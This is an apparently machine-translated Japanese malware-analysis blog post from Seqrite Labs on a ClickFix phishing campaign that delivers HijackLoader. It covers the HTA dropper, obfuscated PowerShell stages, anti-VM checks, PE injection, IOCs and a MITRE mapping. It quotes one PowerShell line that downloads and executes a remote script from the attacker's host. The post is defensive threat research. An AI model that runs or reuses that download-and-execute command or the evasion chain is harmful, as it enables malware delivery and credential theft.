• 製品とサービス
        • クラウド

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • オンプレミス

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Platform

          • Malware Analysis Platform
        • ディーラー&卸売

          • SOHO Total Edition
        • Services

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • サイバーセキュリティと Data Privacy Awareness
  • ソリューション
    • 金融・保険
    • 教育支援
    • 政府・公共機関向け
    • 健康
    • ITeS
    • 製造業
  • 会社
    • 学校区概要 Seqrite
    • リーダーシップ
    • 賞と認定
    • ニュースルーム
  • Partners
    • パートナープログラム
    • パートナーを探す
    • パートナーになる
  • サポート
  • 資料
    • ブログ
    • ホワイトペーパー
    • データシート
    • ケーススタディ
    • 脅威レポート
    • マニュアル
    • PoV
    • 理解する Data Privacy
    • リスクスコアを確認する
    • DPDP対話
    • プライバシーアワー
Seqrite ラボ Blog
営業担当者へ連絡 攻撃を受けているのか?
  • 製品とサービス
        • クラウド

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • オンプレミス

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Platform

          • Malware Analysis Platform
        • ディーラー&卸売

          • SOHO Total Edition
        • Services

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • サイバーセキュリティと Data Privacy Awareness
  • ソリューション
    • 金融・保険
    • 教育支援
    • 政府・公共機関向け
    • 健康
    • ITeS
    • 製造業
  • 会社
    • 学校区概要 Seqrite
    • リーダーシップ
    • 賞と認定
    • ニュースルーム
  • Partners
    • パートナープログラム
    • パートナーを探す
    • パートナーになる
  • サポート
  • 資料
    • ブログ
    • ホワイトペーパー
    • データシート
    • ケーススタディ
    • 脅威レポート
    • マニュアル
    • PoV
    • 理解する Data Privacy
    • リスクスコアを確認する
    • DPDP対話
    • プライバシーアワー
ホーム  /  技術部門  / サイバー詐欺の解明:Clickfix HijackLoaderフィッシングキャンペーンの分析 
サイバー詐欺の解明:Clickfix HijackLoaderフィッシングキャンペーンの分析 
12 9月 2025

サイバー詐欺の解明:Clickfix HijackLoaderフィッシングキャンペーンの分析 

著者 シュルティルパ・バナージー
シュルティルパ・バナージー
技術部門

目次 

  • イントロダクション 
    • 進化する攻撃ローダーの脅威 
    • このブログの目的 
  • 技術的方法論と分析 
    • 初期アクセスとソーシャルエンジニアリング 
    • 多段階の難読化と難読化解除 
    • 分析回避技術 
    • 最終ペイロード 
  • 結論 
  • IOC 
  • クイックヒール Seqrite 保護性能 
  • MITRE ATT&CK マッピング 

 

イントロダクション 

サイバー脅威の進化に伴い、悪意のあるペイロードの最終的な実行は、もはやサイバーセキュリティ業界の唯一の焦点では​​なくなりました。攻撃ローダーは、現代の攻撃において重要な要素として浮上し、初期アクセスの主要なベクトルとして機能し、組織内への高度なマルウェアの密かな配信を可能にしています。単純なペイロードとは異なり、ローダーはセキュリティ防御を回避し、永続性を確立し、最終段階のマルウェアを密かに実行するための好ましい環境を作り出すという、明確な目的を持って設計されています。そのため、ローダーはより重要かつ関連性の高い脅威となり、集中的な分析が求められます。 

最近、 HijackLoaderマルウェアの出現が急増しています。このマルウェアは2023年後半に初めて出現し、ペイロードを配信する能力と、ペイロードのロードおよび実行における興味深い手法により、急速に注目を集めました。主にMaaS(Malware-as-a-Service)として出現し、世界中で金銭目的の攻撃キャンペーンで確認されています。

HijackLoaderは、偽のインストーラー、SEO対策を施したウェブサイト、悪質な広告、海賊版ソフトウェア/映画ポータルなどを通じて拡散されており、広範囲にわたる、機会主義的な被害者層を確保している。

2025年XNUMX月以降、Clickfix を利用して、何も知らない被害者に悪意のある.msi インストーラをダウンロードさせ、HijackLoader を実行させる攻撃者が確認されています。DeerStealer は、被害者のマシンに最終的な実行ファイルとしてダウンロードされたことが確認されています。  

最近、TAG-150 が CastleLoader/CastleBot とともに出現し、より広範な Malware-as-a-Service エコシステムの一部として HijackLoader などの外部サービスも活用していることも確認されています。 

HijackLoaderは、その手口を絶えず改良しながら、頻繁にスティーラーやRATを配信しています。特に、以下のような高度な回避技術で悪名高いです。

  • トランザクションセクションとのプロセスのドッペルゲング 
  • システムDLLのアンフック 
  • WOW64 での直接システムコール 
  • コールスタックスプーフィング 
  • VM対策チェック 

HijackLoaderは発見以来、継続的に進化を続け、様々な業界にとって持続的かつ増大する脅威となっています。そのため、組織は、高度な多段階攻撃のリスクを軽減するために、HijackLoaderの継続的な監視体制を確立し、維持することが不可欠です。 

感染連鎖 

感染連鎖

技術概要 

最初のアクセスは、CAPTCHA ベースのソーシャル エンジニアリング フィッシング キャンペーンから始まります。これは Clickfix と特定されています (この手法は 2025 年 6 月にも攻撃者によって使用されていることが確認されています)。

図1: ソーシャルエンジニアリングのためのCAPTCHAベースのフィッシングページ
図2: 初期実行用のHTAドロッパーファイル

 この HTA ファイルは最初のダウンローダーとして機能し、PowerShell ファイルの実行につながります。   

図3: 初期 PowerShell ローダー スクリプト

上記の Base64 エンコードされた文字列をデコードすると、次に示すように別の PowerShell スクリプトが取得されました。 

図4: 第一段階の難読化された PowerShell スクリプト

上記のデコードされたPowerShellスクリプトは高度に難読化されており、静的分析やシグネチャベースの検出にとって大きな課題となっています。判読可能な文字列や変数を使用する代わりに、複雑な数学演算と文字配列からの文字列の再構築を通じて、コマンドと値を動的に構築します。 

上記のペイロードを解決すると、以下のコマンドにデコードされますが、まだ判読できませんが、完全に難読化を解除できます。 

図5: 第一段階の難読化ペイロードの難読化解除

完全な難読化解除後、スクリプトが URL に接続して後続のファイルをダウンロードしようとしていることがわかります。  

iex ((New-Object System.Net.WebClient).DownloadString('https://rs.mezi[.]bet/samie_bower.mp3'))  

デバッガーで実行すると、このスクリプトは URL に接続できないことを示すエラーを返します。  

図6: 失敗したC2接続のデバッガービュー

ファイルsamie-bower.mp3は別の PowerShell スクリプトで、18,000 行を超える高度に難読化されており、ローダーの次の段階を表しています。

図7: Mainstage PowerShell Loader (samie_bower.mp3)

デバッグの結果、このPowerShellファイルは、実行中のプロセスの数を検査したり、レジストリキーを変更したりするなど、多数のアンチVMチェックを実行していることが分かりました。

図8: 仮想マシンおよびサンドボックス回避チェック

これらのチェックは、スクリプトが仮想化環境で実行されているかどうかを判断するために、VirtualBoxの識別子を特に対象として読み取っているようです。

スクリプトを分析すると、最終的なペイロードが最後の数行に存在することがわかりました。これは、最初の難読化されたローダーが最終的な悪意のあるコマンドを配信する場所です。 

図9: 最終実行

 上記の意味不明な変数宣言は解決されており、実行時に Base64 デコード、XOR 演算、追加の復号ルーチンが実行され、その後、PE ファイルを挿入する可能性のある別の PowerShell スクリプトが読み込まれます。  

図10: PEインジェクション用の中間PowerShellスクリプト
図11: Base64エンコードされた埋め込みPEペイロード

 

このファイルをデコードすると、 MZヘッダーで識別できる埋め込みPEファイルが明らかになります。

図12: MZヘッダー付きのデコードされたPEファイル

このPEファイルは、高密度に圧縮された.NET実行ファイルです。

図13: パックされた.NET実行可能ファイルのペイロード

実行可能ペイロードは、リソース セクションから抽出されたと思われる大量のコードをロードします。 

図14: .NET実行ファイルのメモリ内解凍

解凍されると、実行可能ペイロードが DLL ファイルをロードするように見えます。 

図15: メモリ内にロードされた保護されたDLL

この DLL ファイルも保護されており、リバース エンジニアリングや分析を防止するものと考えられます。 

図16: DLL保護インジケーター

HijackLoaderは、実行ファイルとそれに続くDLLを含む多段階プロセスを使用するという履歴があります。ローダーの最終段階では、C2サーバーへの接続を試み、そこから情報窃盗マルウェアをダウンロードします。この場合、マルウェアは以下のURLへの接続を試みます。

図17: 最終的なC2サーバー接続試行

このC2サーバーは現在アクセスできませんが、接続試行はNekoStealerマルウェアの挙動と一致しています。このHijackLoaderは、Lummaを含む様々な窃盗マルウェアのダウンロードにも関与しています。

結論 

HijackLoaderのような高度なローダーから効果的に防御するには、静的な最終段階のペイロードから、動的かつ継続的に進化する配信メカニズムへと焦点を移す必要があります。初期アクセスと難読化の中間段階の検出に注力することで、組織はこの執拗な脅威に対するより強固な防御を構築できます。初期アクセスや最終ペイロードのみに焦点を当てるのではなく、すべての層にわたってプロアクティブなアプローチを採用することも同様に重要です。中間層は、攻撃者がマルウェアの展開を成功させるために最も大きな変更を加える場所であることが多いからです。 

IOC: 

  • 1b272eb601bd48d296995d73f2cdda54ae5f9fa534efc5a6f1dab3e879014b57 
  • 37fc6016eea22ac5692694835dda5e590dc68412ac3a1523ba2792428053fbf4 
  • 3552b1fded77d4c0ec440f596de12f33be29c5a0b5463fd157c0d27259e5a2df 
  • 782b07c9af047cdeda6ba036cfc30c5be8edfbbf0d22f2c110fd0eb1a1a8e57d 
  • 921016a014af73579abc94c891cd5c20c6822f69421f27b24f8e0a044fa10184 
  • e2b3c5fdcba20c93cfa695f0abcabe218ac0fc2d7bc72c4c3af84a52d0218a82 
  • 52273e057552d886effa29cd2e78836e906ca167f65dd8a6b6a6c1708ffdfcfd 
  • c03eedf04f19fcce9c9b4e5ad1b0f7b69abc4bce7fb551833f37c81acf2c041e 
  • D0068b92aced77b7a54bd8722ad0fd1037a28821d370cf7e67cbf6fd70a608c4 
  • 50258134199482753e9ba3e04d8265d5f64d73a5099f689abcd1c93b5a1b80ee 
  • hxxps[:]//1h[.]vuregyy1[.]ru/3g2bzgrevl[.]hta  
  • 91 [。] 212 [。] 166 [。] 51 
  • 37[.]27[.]165[.]65:1477 
  • コシ[.]コム[.]アル 
  • hxxps[:]//rs[.]mezi[.]bet/samie_bower.mp3 
  • hxxp[:]//77[.]91[.]101[.]66/ 

クイックヒール Seqrite 保護: 

  • スクリプト.トロイの木馬.49900.GC 
  • ローダー.スティーラードロッパーCiR 
  • Trojan.InfoStealerCiR 
  • トロイの木馬エージェント 
  • BDS/511 

MITRE 攻撃: 

戦略  テクニックID  技名 
初期アクセス  T1566.002  フィッシング:スピアフィッシングリンク(CAPTCHAフィッシングページ) 
T1189  ドライブバイコンプロマイズ(マルバタイジング、SEOポイズニング、偽インストーラー) 
実行  T1059.001  コマンドおよびスクリプト インタープリター: PowerShell 
防衛回避  T1027  難読化されたファイルまたは情報(多段階の難読化スクリプト) 
T1140  ファイルまたは情報の難読化解除/デコード(Base64、XORデコード) 
T1562.001  防御を弱める: ツールを無効化または変更する (DLL のアンフック) 
T1070.004  インジケーターの削除: ファイルの削除 (ステージングローダーで使用される可能性が高い) 
T1211  防御回避のためのエクスプロイト(WOW64 での直接システムコール) 
T1036  マスカレード(PowerShell スクリプトの .mp3 などの偽の拡張子) 
プーケットの魅力  T1082  システム情報の検出(VM チェック、レジストリ クエリ) 
T1497.001  仮想化/サンドボックス回避: システム チェック 
固執  T1547.001  ブートまたはログオン時の自動実行: レジストリ実行キー (レジストリの改ざん) 
永続性 / 特権 Esc。  T1055  プロセスインジェクション(PEインジェクションルーチン) 
コマンドアンドコントロール(C2)  T1071.001  アプリケーション層プロトコル: Web プロトコル (HTTP/HTTPS C2 トラフィック) 
T1105  Ingress ツール転送 (追加のペイロードのダウンロード) 
インパクト/コレクション  T1056 / T1005  入力キャプチャ / ローカル システムからのデータ (最終ペイロードの情報窃盗機能) 

 

著者: 

ニラジ・ラザラス・マカサレ 

シュルティルパ・バナージー 

 以前の投稿Echoleak - プロンプトを送信し、Copilot AI から秘密を抽出します。(CVE-20...
次の投稿  地域銀行や協同組合銀行がレガシーな VISA に頼れなくなった理由
シュルティルパ・バナージー

シュルティルパ・バナージーについて

私はシュルティルパです。現在、シニアセキュリティリサーチャーとして働いています。 SEQRITE LABs。約5年の経験を経て、私はブロックチェーンから...

Shrutirupa Banerjieeによる記事 »

関連記事

  • 信頼されたビジネスワークフローの悪用:多段階の偽装窃盗キャンペーン

    22年2026月XNUMX日
  • 払い戻しの裏側:GSTフィッシングからRemcos RATまで、多段階の.NET感染チェーン

    17年2026月XNUMX日
  • オペレーション・シャドウリクルート:ControlRとGoogleスプレッドシートを悪用し、インドの求職者を標的とした採用活動をテーマにしたマルウェアキャンペーン

    14年2026月XNUMX日
注目の著者
  • Seqrite
    Seqrite

    Seqrite は、大手企業向けサイバーセキュリティソリューションプロバイダーです。重点分野は…

    より多くの記事を読んで Seqrite
  • ジョティ・カルレカー
    ジョティ・カルレカー

    私は、新興テクノロジーに関するコンテンツの作成を楽しむ熱心なライターです。

    Jyoti Karlekar の記事をもっと読む
  • ビニーシュ・P
    ビニーシュ・P

    私はサイバーセキュリティに情熱を注ぎ、熱心なライターでもあります。得意分野は…

    Bineesh P によるその他の記事を読む
  • サンジェイ・カトカル
    サンジェイ・カトカル

    Sanjay Katkar 氏は、Quick Heal Technologies の共同マネージング ディレクターです。

    サンジャイ・カトカーによるその他の記事を読む
トピック
apt (25) サイバー攻撃 (36) サイバー攻撃 (58) サイバー攻撃 (16) サイバー攻撃 (15) Cybersecurity (341) サイバーセキュリティ (34) サイバー脅威 (33) サイバー脅威 (51) データ侵害 (56) データ侵害 (29) データ損失 (28) データ損失防止 (34) data privacy (16) データ保護 (34) データセキュリティ (19) DLP (50) DPDP (14) DPDPA (17) Encryption (16) エンドポイントセキュリティ (113) エンタープライズセキュリティ (20) 悪用する (13) GDPR (14) マルウェア (76) マルウェア分析 (14) マルウェア攻撃 (23) MDM (27) Microsoft (15) MITER ATT&CK (14) ネットワークセキュリティ (26) フィッシング詐欺 (30) ランサムウェア (69) ransomware攻撃 (31) ransomware攻撃 (31) ransomwareの保護 (17) Seqrite (41) Seqrite Encryption (27) Seqrite EPS (33) Seqrite Services (16) 脅威の検出 (14) Threat Intelライセンス (21) UTM (34) 脆弱性 (16) ゼロトラスト (13)
Seqrite ラボ

世界中でクラス最高の脅威防止、検出、対応ソリューションによりエンドポイント、データ、ネットワークのセキュリティを簡素化する、大手エンタープライズ IT セキュリティ ソリューション プロバイダーです。

続きを読む Seqrite

私たちに従ってください:

ニュースレターに登録

最新のサイバーセキュリティのトレンドと洞察に関する情報を入手してください。

ローディング
製品とサービス
  • クラウド
  • Endpoint Protection
  • Endpoint Detection and Response
  • Mobile Device Management
  • BYOD
  • Extended Detection and Response
  • Zero Trust Network Access
  • Data Privacy
  • オンプレミス
  • Endpoint Protection
  • Endpoint Detection and Response
  • Data Privacy
  • Platform
  • Malware Analysis Platform
  • マイクロビジネス
  • SOHO Total Edition
  • Services
  • Threat Intel
  • Digital Risk Protection Services (DRPS)
  • Ransomware Recovery as a Services (RRaaS)
  • DPDP Compliance
  • Managed Detection and Response
  • サイバーセキュリティと Data Privacy Awareness
資料
  • ブログ
  • ホワイトペーパー
  • データシート
  • 脅威レポート
  • マニュアル
  • PoV
  • 理解する Data Privacy
  • DPDP対話
  • ポリシーとコンプライアンス
  • EULA
  • ゴーディープ
  • SIA
  • プライバシーアワー
お問い合わせ
  • 登記事務所
  • サイバーセキュリティについて話しましょう
サポート
  • テクニカルサポート
  • ソフトウェア・ダウンロード
  • オフラインアップデータ
  • ファームウェア・アップグレード
  • アップグレード
  • 製品ドキュメント
私たちに関しては
  • 学校区概要 Seqrite
  • リーダーシップ
  • 受賞
  • ニュースルーム
パートナー
  • パートナープログラム
  • パートナーを探す
  • パートナーになる
  • Seqrite 認定

© 2026 クイックヒールテクノロジーズ株式会社

サイトマップ プライバシーポリシー 法的通知 クッキーポリシー 利用規約